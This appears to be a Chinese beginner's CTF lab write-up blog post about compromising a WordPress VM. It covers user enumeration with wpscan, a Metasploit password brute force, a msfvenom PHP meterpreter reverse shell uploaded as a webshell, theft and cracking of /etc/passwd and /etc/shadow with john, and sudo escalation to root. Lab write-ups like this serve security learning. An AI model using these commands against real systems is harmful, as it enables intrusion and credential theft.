小白学习CTF第十二天-web安全暴力破解

web安全暴力破解

在这里插入图片描述
在这里插入图片描述

信息探测

信息探测与之前的探测策略一样
在这里插入图片描述

深入挖掘

在这里插入图片描述
在这里插入图片描述

http://192.168.56.103/secret/

在这里插入图片描述

http://192.168.56.103/secret/wp-login.php

在这里插入图片描述
但是发现站点登录不上去,怎么办呢?
在这里插入图片描述
打不开的网页可以设置对应的站点,通过把相应的站点改为IP地址即可
gedit /etc/hosts
靶场IP 无法登录的站点
解析一下网页结构
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
之后就可以再次登陆了。
在这里插入图片描述

暴力破解

在这里插入图片描述
首先要查看用户名

wpscan

在这里插入图片描述

wpscan --url www.vtcsec.com/secret/ --enumerate u

在这里插入图片描述
得到了用户名以及密码了。
之后启动msfconsole

msfconsole
use auxiliary/scanner/http/wordpress_login_enum
set rhosts 
set pass_file /usr/share/wordlists/dirb/common.txt
set user admin
set targeturi /secret/
set rhosts IP
set username admin
run

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

上传webshell获取控制权

在这里插入图片描述
在这里插入图片描述
制作一个对应的shell

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.17.128 lport=4444 -f raw

在这里插入图片描述

back
set payload php/meterpreter/reverse_tcp
show options
set lhost 192.168.253.12
run

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
run 之后像之前对应的网页上传webshell,等待反弹权限,这里就不介绍了。

http://192.168.253.20/secret/wp-content/themes/twentysevevteen/404.php
sysinfo
id

在这里插入图片描述

root权限

在这里插入图片描述
下载passwd以及shadow

download /etc/passwd    
download /etc/shadow

unshadow passwd shadow > cracked
john cracked

在这里插入图片描述
之后破解对应的用户名以及密码。
在这里插入图片描述
记得优化终端。

python -c "import pty;pty.spawn('/bin/bash')"

在这里插入图片描述
之后准备获取root权限。
在这里插入图片描述
但是这里并没有获取root权限,只是一个比普通用户权限,我们使用。

su - marlinspike
sudo -l
sudo bash

在这里插入图片描述
返回root权限了。
在这里插入图片描述

获取flag

在这里插入图片描述
在这里插入图片描述

总结

在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值